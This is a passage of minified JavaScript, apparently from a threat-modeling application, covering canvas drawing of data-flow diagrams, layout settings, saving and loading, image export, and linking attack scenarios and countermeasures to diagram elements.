i&&(e=JSON.parse(i)),e&&e[this.Diagram.DiagramType]?Number(e[this.Diagram.DiagramType]):this.Diagram.DiagramType==xn.Context?wn.Both:this.Diagram.DiagramType==xn.UseCase?wn.End:wn.Initiator}set FlowArrowPosition(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_POS),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=[wn.Both,wn.Initiator].includes(e)?this instanceof $T?wn.Initiator:wn.Both:e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ARROW_POS,JSON.stringify(n))}get BendFlow(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_BEND);return i&&(e=JSON.parse(i)),e&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:this.Diagram.DiagramType==xn.DataFlow}set BendFlow(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_BEND),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ARROW_BEND,JSON.stringify(n))}get AnchorCount(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT);return i&&(e=JSON.parse(i)),e&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:4}set AnchorCount(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT,JSON.stringify(n)),this.Canvas.getObjects().forEach(r=>{r._objects&&r._objects.filter(d=>d[ot.myType]==wt.FlowAnchor).forEach(d=>{8==e?d.set(ot.visible,!0):[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(d[ot.fa])&&d.set(ot.visible,!1)})})}get CanSetAnchorCount(){return[xn.Context,xn.DataFlow].includes(this.Diagram.DiagramType)}get ShowName(){let e=null,i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_NAME);return i&&(e=JSON.parse(i)),e&&null!=e[this.Diagram.DiagramType]?e[this.Diagram.DiagramType]:this.Diagram.DiagramType==xn.DataFlow}set ShowName(e){let i=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ARROW_NAME),n={};null!=i&&(n=JSON.parse(i)),n[this.Diagram.DiagramType]=e,this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ARROW_NAME,JSON.stringify(n))}get FontSizeConfigIndex(){const e=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_TEXTSIZE_INDEX);return null==e?3:Number(e)}set FontSizeConfigIndex(e){this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_TEXTSIZE_INDEX,String(e)),this.changeFontSize()}get ObjectCountToInit(){if(!this.Diagram.Elements)return"";let e=this.Diagram.Elements.GetChildrenFlat().filter(i=>!i.UserCheckedElement).length;return e>0?e.toString():""}get IsCreatingFlow(){return null!=this.tmpFlowLine}get IsObjectSelected(){var e;return(null===(e=this.Canvas)||void 0===e?void 0:e.getActiveObjects().length)>0}get SelectedElement(){var e;let i=null===(e=this.Canvas)||void 0===e?void 0:e.getActiveObjects();if(1==(null==i?void 0:i.length)){if(i[0][ot.ID])return this.getViewBaseElement(this.Canvas.getActiveObject()[ot.ID]);if(i[0][ot.flowID])return this.getViewBaseElement(this.getCanvasElementByCanvasID(i[0][ot.flowID])[ot.ID])}return null}set SelectedElement(e){if(!this.Canvas||this.MouseMode==Zs.Move||this.blockSelectionChangedAfterSend)return;this.blockSelectionChangedAfterReceive=!0,setTimeout(()=>{this.blockSelectionChangedAfterReceive=!1},250);let i=this.Canvas.getActiveObject();if(i&&i[ot.ID]==(null==e?void 0:e.ID))return;if(null==e&&this.SelectedElement)return this.Canvas.discardActiveObject(),void this.onCanvasModified();this.Canvas.discardActiveObject();let n=this.Canvas.getObjects();try{let r=n.find(c=>c[ot.ID]==e.ID);this.Canvas.setActiveObject(r),r[ot.elementTypeID]==Et.DataFlow&&this.setFlowSelected(r,!0)}catch(r){}this.Canvas.renderAll()}SetMouse(){this.MouseMode=Zs.Mouse}SetPan(){this.MouseMode=Zs.Pan}SetMove(){this.MouseMode=Zs.Move}Save(){this.ToJSONString()}TextIncrease(){const e=this.getCanvasElementByID(this.SelectedElement.ID);let i=null,n=null,r=null;e._objects?(i=e._objects.find(d=>d[ot.myType]==wt.ElementType),r=e._objects.find(d=>d[ot.myType]==wt.ElementPhyElement),n=e._objects.find(d=>d[ot.myType]==wt.ElementName)):e[ot.myType]==wt.DataFlowLine&&(n=this.getCanvasElementByCanvasID(e[ot.textID]));let c=null;i?c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Type==i[ot.fontSize])+1]:n&&(c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Name==n[ot.fontSize])+1]),c&&(n&&n.set(ot.fontSize,e[ot.myType]!=wt.TrustArea?c.Name:c.Type),i&&i.set(ot.fontSize,c.Type),r&&r.set(ot.fontSize,c.Type),this.Canvas.requestRenderAll(),this.onCanvasModified())}TextDecrease(){const e=this.getCanvasElementByID(this.SelectedElement.ID);let i=null,n=null,r=null;e._objects?(i=e._objects.find(d=>d[ot.myType]==wt.ElementType),r=e._objects.find(d=>d[ot.myType]==wt.ElementPhyElement),n=e._objects.find(d=>d[ot.myType]==wt.ElementName)):e[ot.myType]==wt.DataFlowLine&&(n=this.getCanvasElementByCanvasID(e[ot.textID]));let c=null;i?c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Type==i[ot.fontSize])-1]:n&&(c=this.fontSizeConfigs[this.fontSizeConfigs.findIndex(d=>d.Name==n[ot.fontSize])-1]),c&&(n&&n.set(ot.fontSize,e[ot.myType]!=wt.TrustArea?c.Name:c.Type),i&&i.set(ot.fontSize,c.Type),r&&r.set(ot.fontSize,c.Type),this.Canvas.requestRenderAll(),this.onCanvasModified())}SendToBack(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.sendToBack(e)),this.SelectedElement=null,this.onCanvasModified()}SendBackwards(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.sendBackwards(e)),this.SelectedElement=null,this.onCanvasModified()}BringForward(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.bringForward(e)),this.onCanvasModified()}BringToFront(){this.Canvas.getActiveObjects().forEach(e=>this.Canvas.bringToFront(e)),this.onCanvasModified()}AddAnnotation(){let e=new Ei.fabric.IText("Text Annotation",{left:100,top:40,fill:this.StrokeColor,cavnasID:Fo(),myType:wt.Annotation,fontSize:16,transparentCorners:!0});this.Canvas.add(e),this.onCanvasModified()}SelectNextUninitObject(){let e=this.Diagram.Elements.GetChildrenFlat().filter(n=>!n.UserCheckedElement),i=e[e.length-1];i.UserCheckedElement=!0,this.SelectedElement=i,this.SelectionChanged.emit(i)}AddThreat(){if(this.SelectedElement){let e=this.dataService.Project.CreateAttackScenario(this.Diagram.ID,!1);e.SetMapping("",[],this.SelectedElement,[this.SelectedElement],null,null,null,null),e.IsGenerated=!1,this.dialog.OpenAttackScenarioDialog(e,!0).subscribe(i=>{i||this.dataService.Project.DeleteAttackScenario(e)})}}AddTestCase(){if(this.SelectedElement){const e=this.dataService.Project.CreateTestCase();e.AddLinkedElement(this.SelectedElement),this.dialog.OpenTestCaseDialog(e,!0).subscribe(i=>{i||this.dataService.Project.DeleteTestCase(e)})}}AddCountermeasure(){if(this.SelectedElement){let e=this.dataService.Project.CreateCountermeasure(this.Diagram.ID,!1);e.SetMapping(null,[this.SelectedElement],[]),this.dialog.OpenCountermeasureDialog(e,!0,this.Diagram.Elements.GetChildrenFlat()).subscribe(i=>{i||this.dataService.Project.DeleteCountermeasure(e)})}}CancelCreateFlow(){this.tmpFlowLine&&(this.Canvas.remove(this.tmpFlowLine),this.tmpFlowLine=null)}SetZoom(e,i=null,n=null){i&&n?this.Canvas.zoomToPoint({x:i,y:n},e):this.Canvas.setZoom(e)}OnResized(e,i,n=!0){if(this.initializeCanvas(i),this.Canvas){const r=this.getCanvasSize();if(this.CanvasScreenWidth=e.newRect.width,this.CanvasScreenHeight=e.newRect.height-5,n){const d=e.newRect.height>r[3]?e.newRect.height:r[3];this.Canvas.setWidth(e.newRect.width>r[2]?e.newRect.width:r[2]),this.Canvas.setHeight(d-5)}else this.Canvas.setWidth(e.newRect.width),this.Canvas.setHeight(e.newRect.height-5);this.Canvas.renderAll()}}OnOuterCanvasMouseDown(e){4==e.buttons&&(this.MouseMode=Zs.Pan,this.Canvas.lastPosX=e.clientX,this.Canvas.lastPosY=e.clientY)}OnOuterCanvasMouseUp(e){this.MouseMode==Zs.Pan&&(this.MouseMode=Zs.Mouse)}OnDeleteElement(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&this.deleteElement(e.ID)})}ToJSONString(e=!1){let i=JSON.stringify(this.Canvas.toJSON(Object.keys(ot).filter(n=>"string"==typeof n)),null,e?2:0);return this.Diagram.Canvas=i,i}FromJSONString(e){this.Canvas.loadFromJSON(JSON.parse(e),i=>{null!=i?console.error(i):(this.Diagram.Canvas=e,this.onFromJSONString())})}GetImage(){return this.Canvas.toDataURL({format:"image/png"})}SaveImage(){const e=ns.FromJSON(JSON.parse(JSON.stringify(this.Diagram.ToJSON())),this.dataService.Project,this.dataService.Project.Config),i=1500,r=document.createElement("div");r.style.width=i.toString()+"px",r.style.height=750..toString()+"px",r.style.pointerEvents="none";let d,c=new xb(new DOMRectReadOnly(0,0,i,750),null);d=e instanceof b2?new R7(e,this.dataService,this.theme,this.dialog,this.locStorage,this.translate,e.IsUseCaseDiagram?aa.UseCase:aa.Context):new $T(e,this.dataService,this.theme,this.dialog,this.locStorage,this.translate),d.OnResized(c,r),d.PrintMode(this.SaveImageWithGrid);const T=d.FitToCanvas(i);c=new xb(new DOMRectReadOnly(0,0,1510,T[1]+10),null),r.style.height=T[1].toString()+"px",d.OnResized(c,r,!1);const k=window.open(),q=new Image;q.onload=()=>{k.document.body.append(q),this.theme.IsDarkMode&&d.SetColors(!0)},q.src=d.GetImage();const Y=document.createElement("a");document.body.appendChild(Y),Y.href=q.src,Y.target="_self",Y.download=this.Diagram.Name+".png",Y.click(),document.body.removeChild(Y)}SetColors(e){this.isDarkMode=e,e?(this.StrokeColor="white",this.BackgroundColor=t.BackgroundColorDark):(this.StrokeColor="black",this.BackgroundColor=t.BackgroundColorLight),this.setCanvasColor()}PrintMode(e){this.SetColors(!1);const i=c=>{if(c.stroke&&c.stroke==this.theme.Primary&&c.set("stroke",this.StrokeColor),c.fill&&c.fill==this.theme.Primary){let d="";"white"==c.fill?d="black":"black"==c.fill||"rgb(0,0,0)"==c.fill?d="white":"transparent"==c.fill?d=c.fill:c.fill==t.BackgroundColorDark?d=t.BackgroundColorLight:c.fill==t.BackgroundColorLight?d=t.BackgroundColorDark:c.fill==this.theme.Primary&&(d=this.theme.Primary),c.set("fill",d)}if(c.cornerColor&&c.cornerColor==this.theme.Primary){let d="";"transparent"==c.cornerColor?d="transparent":"white"==c.cornerColor?d="black":"black"==c.cornerColor&&(d="white"),c.set("cornerColor",d)}},r=c=>{c.forEach(d=>{i(d),(c=>{c[ot.myType]==wt.GridLine&&(c[ot.visible]=e)})(d),d._objects&&r(d._objects)})};r(this.Canvas.getObjects())}FitToCanvas(e,i=0){const n=this.getCanvasSize();let r=n[0],c=n[1],d=n[2],T=n[3],k=this.Canvas.viewportTransform;k[4]=-r,k[5]=-c;let q=e/(d-r),Y=(T-c)*q;if(i>0&&Y>i){const te=i/Y;q*=te,e*=te,Y*=te}return this.Canvas.setZoom(q),this.Canvas.requestRenderAll(),[e,Y]}initializeCanvas(e){if(this.isInitalized)return!1;this.isInitalized=!0;let i=document.createElement("canvas");i.style.marginTop="1px",e.appendChild(i),this.Canvas=new Ei.fabric.Canvas(i),this.Canvas.selection=!1,this.Canvas.selectionFullyContained=!0,this.Canvas.targetFindTolerance=2,this.Canvas.uniformScaling=!1,this.Canvas.setWidth(e.clientWidth),this.CanvasScreenWidth=e.clientWidth,this.CanvasScreenHeight=e.clientHeight-5,this.Canvas.setHeight(e.clientHeight-5),this.SetColors(this.theme.IsDarkMode),this.theme.ThemeChanged.subscribe(c=>{this.SetColors(c)}),Ei.fabric.Object.prototype.transparentCorners=!1,Ei.fabric.Object.prototype.cornerColor=this.StrokeColor,Ei.fabric.Object.prototype.cornerStyle="circle",Ei.fabric.Object.prototype.controls.deleteControl=new Ei.fabric.Control({x:.5,y:-.5,offsetX:0,offsetY:0,cursorStyle:"pointer",mouseUpHandler:(c,d)=>{let T=null;if(d.target[ot.ID]&&d.target[ot.elementTypeID]!=Et.DataFlow)T=this.getViewBaseElement(d.target[ot.ID]);else if(d.target[ot.elementTypeID]==Et.DataFlow||d.target[ot.flowID]){let k=d.target[ot.elementTypeID]==Et.DataFlow?d.target:this.getCanvasElementByCanvasID(d.target[ot.flowID]);T=this.getViewBaseElement(k[ot.ID])}T&&T.ID!=this.Diagram.Elements.ID?this.OnDeleteElement(T):this.Canvas.remove(d.target),this.Canvas.requestRenderAll()},render:this.renderIcon}),Ei.fabric.Canvas.prototype.getAbsoluteCoords=function(c){return{left:c.left+this._offset.left,top:c.top+this._offset.top}},document.onkeydown=c=>{"Escape"==c.key&&this.CancelCreateFlow()},this.Canvas.on("mouse:wheel",c=>this.onCanvasMouseWheel(c)),this.Canvas.on("mouse:move",c=>this.onCanvasMouseMove(c)),this.Canvas.on("mouse:down",c=>this.onCanvasMouseDown(c)),this.Canvas.on("mouse:up",c=>this.onCanvasMouseUp(c)),this.Canvas.on("mouse:over",c=>this.onCanvasMouseOver(c)),this.Canvas.on("mouse:out",c=>this.onCanvasMouseOut(c)),this.Canvas.on("drop",c=>this.onCanvasDrop(c)),this.Canvas.on("object:modified",c=>this.onCanvasModified()),this.Canvas.on("object:moving",c=>this.onCanvasObjectMoving(c)),this.Canvas.on("object:scaling",c=>{this.blockCheckingIntersection=!0}),this.Canvas.on("selection:updated",c=>this.onCanvasSelectionChanged(c)),this.Canvas.on("selection:created",c=>this.onCanvasSelectionChanged(c)),this.Canvas.on("selection:cleared",c=>this.onCanvasSelectionChanged(c)),this.Diagram.Elements.GetChildrenFlat().forEach(c=>{c.NameChanged.subscribe(d=>this.changeObjectName(c.ID)),c.OutOfScopeChanged.subscribe(d=>this.changeObjectBorder(c.ID)),c instanceof lc?(c.TypeChanged.subscribe(d=>this.changeObjectType(c.ID,d.Name)),c.PhysicalElementChanged.subscribe(d=>this.changeObjectPhysicalElement(c.ID,d))):c instanceof os&&c.TypeChanged.subscribe(d=>this.changeObjectType(c.ID,nM.ToString(d)))}),this.Diagram.Canvas&&this.FromJSONString(this.Diagram.Canvas);const n=3e3;for(let c=-n;c<n;c+=t.GridSize)this.Canvas.add(new Ei.fabric.Line([c,-n,c,n],{stroke:this.StrokeColor,selectable:!1,evented:!1,myType:wt.GridLine,opacity:.07,visible:this.ShowGrid})),this.Canvas.add(new Ei.fabric.Line([-n,c,n,c],{stroke:this.StrokeColor,selectable:!1,evented:!1,myType:wt.GridLine,opacity:.07,visible:this.ShowGrid}));this.Canvas.getObjects().filter(c=>c[ot.myType]==wt.GridLine).forEach(c=>this.Canvas.sendToBack(c));const r=this.locStorage.Get(si.PAGE_MODELING_DIAGRAM_ZOOM);return null!=r&&this.SetZoom(Number(r)),!0}onFromJSONString(){this.setCanvasColor();let e=[],i=[];const n=(r,c,d)=>{let k=new Ei.fabric.Circle({left:r,top:c,radius:6.5,fill:this.StrokeColor,opacity:.15});const q=r+6.5,Y=c+6.5,te=4.33;let pe=new Ei.fabric.Line([q-te,Y-te,q+te,Y+te],{stroke:this.theme.Primary,selectable:!1}),Re=new Ei.fabric.Line([q-te,Y+te,q+te,Y-te],{stroke:this.theme.Primary,selectable:!1});return new Ei.fabric.Group([k,pe,Re],{left:r,top:c,hasControls:!1,hasBorders:!1,lockRotation:!0,opacity:0,fa:d,myType:wt.FlowAnchor,canvasID:Fo()})};this.Canvas.getObjects().forEach(r=>{r._objects&&r._objects.filter(d=>null!=d[ot.fa]).forEach(d=>{if(d._objects){if(r[ot.myType]==wt.Interactor){let T=-6.5,k=-19.29;d[ot.fa]==_i.East?T=19:d[ot.fa]==_i.West?T=-28.5:d[ot.fa]==_i.North?k=-38.79:d[ot.fa]==_i.South&&(k=3.71),d.left=T,d.top=k,d.setCoords()}}else{const T=n(r.left+r.width/2+d.left,r.top+r.height/2+d.top,d[ot.fa]);this.Canvas.add(T);const k=r._objects.indexOf(d);r._objects.splice(k,1),r.addWithUpdate(T),this.Canvas.remove(d),console.log("update flow anchor")}})}),this.Canvas.getObjects().forEach(r=>{var c,d,T,k,q;let Y=null;if(r[ot.ID])Y=this.getViewBaseElement(r[ot.ID]);else if(r[ot.flowID]){let te=this.getCanvasElementByCanvasID(r[ot.flowID]);te&&te[ot.ID]&&(Y=this.getViewBaseElement(te[ot.ID]),Y&&(Y instanceof M2||Y instanceof rs)&&(this.subscriptionsLineType.includes(Y.ID)||(null===(c=Y.LineTypeChanged)||void 0===c||c.subscribe(pe=>this.flowChangeLineType(Y.ID,pe)),null===(d=Y.ArrowPosChanged)||void 0===d||d.subscribe(pe=>this.flowUpdateFlowArrow(Y.ID)),null===(T=Y.BendFlowChanged)||void 0===T||T.subscribe(pe=>this.flowChangeBending(Y.ID,pe)),null===(k=Y.DirectionChanged)||void 0===k||k.subscribe(pe=>this.flowChangeDirection(Y.ID)),null===(q=Y.AnchorChanged)||void 0===q||q.subscribe(pe=>this.flowChangeAnchor(Y.ID,pe)),this.subscriptionsLineType.push(Y.ID))))}r._objects&&r._objects.filter(pe=>null!=pe[ot.fa]).forEach(pe=>{this.subscriptionsFlowAnchor.includes(pe[ot.canvasID])||(pe.on("mousedown",Re=>this.onFlowAnchorHit(Re)),this.subscriptionsFlowAnchor.push(pe[ot.canvasID]))}),null!=Y||[wt.Annotation,wt.TextPosPoint].includes(r[ot.myType])?(Y&&this.changeObjectName(Y.ID),r[ot.elementTypeID]==Et.DataFlow?e.push(r):[wt.DataFlowArrowE,wt.DataFlowArrowS].includes(r[ot.myType])&&i.push(r),(!Y||Y&&!this.subscriptionsScaling.includes(Y.ID))&&(this.subscribeScaling(r),Y&&this.subscriptionsScaling.push(Y.ID))):this.Canvas.remove(r)}),i.forEach(r=>{let c="";for(let k=0;k<r.path.length-1;k++)c+=r.path[k].join(" ")+" ";c+="z";let d=new Ei.fabric.Path(c,{objectCaching:!1,originX:"center",originY:"center",selectable:!1});d.setControlsVisibility({mtr:!1,mts:!1}),["fill","stroke","strokeWidth",ot.canvasID,ot.flowID,ot.visible,ot.myType].forEach(k=>{d[k]=r[k]}),this.Canvas.remove(r),this.Canvas.add(d)}),e.forEach(r=>{var c,d,T;let q=r.path[0][2],Y=r.path[1][1],te=r.path[1][2],pe=r.path[1][3],Re=r.path[1][4],Fe=["M",r.path[0][1].toString(),q.toString(),"Q",Y.toString(),te.toString(),pe.toString(),Re.toString()].join(" "),Ne=new Ei.fabric.Path(Fe,{fill:"",stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,canvasID:r[ot.canvasID],selectable:!0,lockMovementX:!0,lockMovementY:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,hasControls:!1,transparentCorners:!0,cornerColor:"transparent",perPixelTargetFind:!0});[ot.ID,ot.elementTypeID,ot.myType,ot.strokeDashArray,ot.arrowEID,ot.arrowSID,ot.textID,ot.bendFlow,ot.p0ID,ot.p1ID,ot.p2ID,ot.fa1,ot.fe1,ot.fa2,ot.fe2,ot.fontSize].forEach(Ze=>{Ne.set(Ze,r[Ze])}),Ne.setControlsVisibility({mtr:!1,mts:!1}),this.Canvas.add(Ne),this.Canvas.remove(r),this.flowUpdateText(Ne),this.flowUpdateFlowArrow(Ne[ot.ID]),null===(c=this.getCanvasElementByCanvasID(Ne[ot.p0ID]))||void 0===c||c.set("opacity",0),null===(d=this.getCanvasElementByCanvasID(Ne[ot.p1ID]))||void 0===d||d.set("opacity",0),null===(T=this.getCanvasElementByCanvasID(Ne[ot.p2ID]))||void 0===T||T.set("opacity",0);let ut=this.getCanvasElementByCanvasID(r[ot.arrowEID]);this.Canvas.bringToFront(ut),ut=this.getCanvasElementByCanvasID(r[ot.arrowSID]),this.Canvas.bringToFront(ut)}),this.Canvas.getObjects().filter(r=>r[ot.myType]==wt.DataFlowCircle).forEach(r=>r.selectable=!1),this.Canvas.getObjects().filter(r=>[Et.LogDataStore,Et.LogProcessing,Et.LogProcessing,Et.LogTrustArea].includes(r[ot.elementTypeID])).forEach(r=>{const c=this.getViewBaseElement(r[ot.ID]);null!=c.PhysicalElement&&this.changeObjectPhysicalElement(r[ot.ID],c.PhysicalElement)}),this.Canvas.getObjects().forEach(r=>{if(r._objects){const c=r._objects.find(d=>d[ot.myType]==wt.ElementType);c&&(c.text=c.text.replace("<<","\xab").replace(">>","\xbb"))}}),this.Canvas.getObjects().forEach(r=>this.fireScaling(r)),this.Canvas.requestRenderAll()}onCanvasModified(){this.checkIntersection(),this.isSaving||(this.isSaving=!0,setTimeout(()=>{this.isSaving=!1,this.Save()},1e3))}onCanvasMouseWheel(e){if(e.e.ctrlKey){let i=e.e.deltaY,n=this.Canvas.getZoom();n*=Math.pow(.999,i),n>3&&(n=3),n<.33&&(n=.33),this.SetZoom(n,e.e.offsetX,e.e.offsetY),e.e.preventDefault(),e.e.stopPropagation()}}onCanvasMouseMove(e){if((1==e.e.buttons||4==e.e.buttons)&&this.Canvas.isDragging){let i=this.Canvas.viewportTransform;i[4]+=e.e.clientX-this.Canvas.lastPosX,i[4]>0&&(i[4]=0),i[5]+=e.e.clientY-this.Canvas.lastPosY,i[5]>0&&(i[5]=0),this.Canvas.requestRenderAll(),this.Canvas.lastPosX=e.e.clientX,this.Canvas.lastPosY=e.e.clientY}this.tmpFlowLine&&(this.tmpFlowLine.set({x2:e.absolutePointer.x,y2:e.absolutePointer.y}),this.tmpFlowLine.setCoords(),this.Canvas.requestRenderAll())}onCanvasMouseDown(e){this.Canvas.isDragging&&(this.Canvas.lastPosX=e.e.clientX,this.Canvas.lastPosY=e.e.clientY)}onCanvasMouseUp(e){var i;if(this.Canvas.setViewportTransform(this.Canvas.viewportTransform),this.MouseMode==Zs.Pan)this.SetMouse();else if(this.MouseMode==Zs.Mouse){let n=this.blockCheckingIntersection;this.blockCheckingIntersection=!1,n&&this.checkIntersection(),(null===(i=e.transform)||void 0===i?void 0:i.target)&&e.transform.target[ot.ID]&&!this.blockSelectionChangedAfterSend&&!this.blockCheckingIntersection&&this.getViewBaseElement(e.transform.target[ot.ID])==this.SelectedElement&&(this.instanceOfContainer(this.SelectedElement)&&this.SendToBack(),this.SelectionChanged.emit(null))}}onCanvasMouseOver(e){if(e.target){if(e.target._objects){let i=e.target,n=e.target._objects.filter(r=>ot.fa in r);if(e.target[ot.myType]==wt.FlowAnchor&&(n=e.target.group._objects.filter(r=>ot.fa in r),i=e.target.group),n.length>0){const r=this.overTimeoutBuffer[i[ot.canvasID]];r&&(clearTimeout(r),delete this.overTimeoutBuffer[i[ot.canvasID]]),n.forEach(c=>{c.set(ot.opacity,1),this.Canvas.bringToFront(c)}),this.Canvas.requestRenderAll()}}null!=e.target[ot.t0ID]&&(this.getCanvasElementByCanvasID(e.target[ot.t0ID]).set(ot.opacity,1),this.Canvas.requestRenderAll())}}onCanvasMouseOut(e){if(e.target){if(e.target._objects){let i=e.target,n=e.target._objects.filter(r=>ot.fa in r);e.target[ot.myType]==wt.FlowAnchor&&(n=e.target.group._objects.filter(r=>ot.fa in r),i=e.target.group),n.length>0&&null==this.overTimeoutBuffer[i[ot.canvasID]]&&(this.overTimeoutBuffer[i[ot.canvasID]]=setTimeout(()=>{n.forEach(r=>{r.set(ot.opacity,0)}),delete this.overTimeoutBuffer[i[ot.canvasID]],this.Canvas.requestRenderAll()},500))}if(null!=e.target[ot.t0ID]){let i=this.getCanvasElementByCanvasID(e.target[ot.t0ID]);setTimeout(()=>{i.set(ot.opacity,0),this.Canvas.requestRenderAll()},1500)}}}arrowVisibilityStore(){this.arrowVisibilityBuffer={},this.Canvas.getObjects().filter(e=>[wt.DataFlowArrowE,wt.DataFlowArrowS].includes(e[ot.myType])).forEach(e=>{this.arrowVisibilityBuffer[e[ot.canvasID]]=e[ot.visible],e.set(ot.visible,!1),e.set("dirty",!0)}),this.Canvas.requestRenderAll()}arrowVisibilityRestore(){Object.keys(this.arrowVisibilityBuffer).forEach(e=>{const i=this.getCanvasElementByCanvasID(e),n=this.arrowVisibilityBuffer[e];i.set(ot.visible,null==n||n)}),this.Canvas.getObjects().forEach(e=>this.onMovingObject(e)),this.Canvas.requestRenderAll()}onCanvasObjectMoving(e){if(this.MouseMode==Zs.Move)return this.mouseMovingState==gf.Selecting&&(this.arrowVisibilityStore(),this.mouseMovingState=gf.Moving),void this.Canvas.getObjects().forEach(i=>this.onMovingObject(i));this.onMovingObject(e.target)}onMovingObject(e){if(this.blockCheckingIntersection=!0,["p1"].includes(e[ot.name])?this.dfOnPointMoving(e):e[ot.myType]==wt.TextPosPoint?this.textOnMovingPoint(e):e[ot.t0ID]&&this.textOnMovingText(e),e[ot.ID]){const i=n=>Math.round(n/t.GridSize*2)%2==0;this.ShowGrid&&this.StickToGrid&&(i(e.left)&&e.set("left",Math.round(e.left/t.GridSize)*t.GridSize),i(e.top)&&e.set("top",Math.round(e.top/t.GridSize)*t.GridSize),e.setCoords())}e[ot.dfs]&&e[ot.dfs].forEach(i=>{const n=this.getCanvasElementByCanvasID(i);let r=n[ot.fe2]==e[ot.canvasID],c=this.getFlowAnchorPoint(r?n[ot.fa2]:n[ot.fa1],e),T=this.getCanvasElementByCanvasID(n[r?ot.p2ID:ot.p0ID]);T.left=c[0],T.top=c[1];let k=0,q=0;if(e.group&&(k=e.group.left+e.group.width/2,q=e.group.top+e.group.height/2),r?(n.path[1][3]=k+c[0],n.path[1][4]=q+c[1]):(n.path[0][1]=k+c[0],n.path[0][2]=q+c[1]),0==n[ot.bendFlow]){let pe=this.getCanvasElementByCanvasID(n[ot.p1ID]),Fe=n.path[0][2]+(n.path[1][4]-n.path[0][2])/2;pe.left=n.path[1][1]=n.path[0][1]+(n.path[1][3]-n.path[0][1])/2,pe.top=n.path[1][2]=Fe}let Y=n._calcDimensions();n.set({width:Y.width,height:Y.height,left:Y.left,top:Y.top,pathOffset:{x:Y.width/2+Y.left,y:Y.height/2+Y.top},dirty:!0}),n.setCoords();let te=this.getViewBaseElement(n[ot.ID]);this.flowUpdateFlowArrow(te.ID),this.flowUpdateText(n),this.Canvas.requestRenderAll()}),e[ot.myType]!=wt.GridLine&&(e.left<0&&(e.left=0,this.Canvas.requestRenderAll()),e.top<0&&(e.top=0,this.Canvas.requestRenderAll()),e.left+e.width>this.xMax&&e.left+e.width>this.Canvas.width&&(this.Canvas.setWidth(e.left+e.width),this.Canvas.requestRenderAll()),e.top+e.height>this.yMax&&e.top+e.height>this.Canvas.height&&(this.Canvas.setHeight(e.top+e.height),this.Canvas.requestRenderAll()))}onCanvasSelectionChanged(e){if(this.MouseMode!=Zs.Move){if(!this.blockSelectionChangedAfterReceive){if("selected"in e&&e.selected.length>0)if(1==e.selected.length){let i=e.selected[0];if(i[ot.fa])return void this.Canvas.discardActiveObject();if(i.group&&(i=i.group),i[ot.ID]){let n=this.getViewBaseElement(i[ot.ID]);this.SelectionChanged.emit(n),i[ot.elementTypeID]==Et.DataFlow&&this.setFlowSelected(i,!0)}else if(i[ot.flowID]){let n=this.getCanvasElementByCanvasID(i[ot.flowID]),r=this.getViewBaseElement(n[ot.ID]);this.SelectionChanged.emit(r),this.setFlowSelected(n,!0)}}else console.error("More than one object selected");else"deselected"in e&&(this.setFlowSelected(null,!1),this.SelectionChanged.emit(null));this.blockSelectionChangedAfterSend=!0,setTimeout(()=>{this.blockSelectionChangedAfterSend=!1},250)}}else this.mouseMovingState==gf.Moving&&(this.SetMouse(),this.mouseMovingState=gf.None,this.arrowVisibilityRestore())}onCanvasDrop(e){const i=e.e.dataTransfer.getData("dragDropData");if(i){let n=this.Canvas.viewportTransform;this.createElement(JSON.parse(i),(e.e.offsetX-n[4])/n[0],(e.e.offsetY-n[5])/n[0]),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}}onFlowAnchorHit(e){var i,n,r,c,d,T;if(!this.blockCreateLine){let k="",q=null;1==(null===(i=e.subTargets)||void 0===i?void 0:i.length)?(k=e.subTargets[0][ot.fa],q=e.target):(k=e.target[ot.fa],q=e.target.group);let Y=this.getFlowAnchorPoint(k,q);if(null==this.tmpFlowLine)this.tmpFlowLineEndpoint=q,this.tmpFlowLine=new Ei.fabric.Line([Y[0],Y[1],Y[0],Y[1]],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,hasControls:!1}),this.tmpFlowLine[ot.fa1]=k,this.Canvas.add(this.tmpFlowLine),this.Canvas.sendToBack(this.tmpFlowLine);else if(this.tmpFlowLineEndpoint[ot.canvasID]!=q[ot.canvasID]){const te=this.instantiateFlow();if(this.instanceOfCanvasFlow(te)){te.ArrowPos=this.FlowArrowPosition,te.BendFlow=this.BendFlow,te.ShowName=this.ShowName;let pe=this.createFlow(this.tmpFlowLine.x1,this.tmpFlowLine.y1,Y[0],Y[1],te);te.NameChanged.subscribe(Re=>this.changeObjectName(te.ID)),te.OutOfScopeChanged.subscribe(Re=>this.changeObjectBorder(te.ID)),null===(n=te.LineTypeChanged)||void 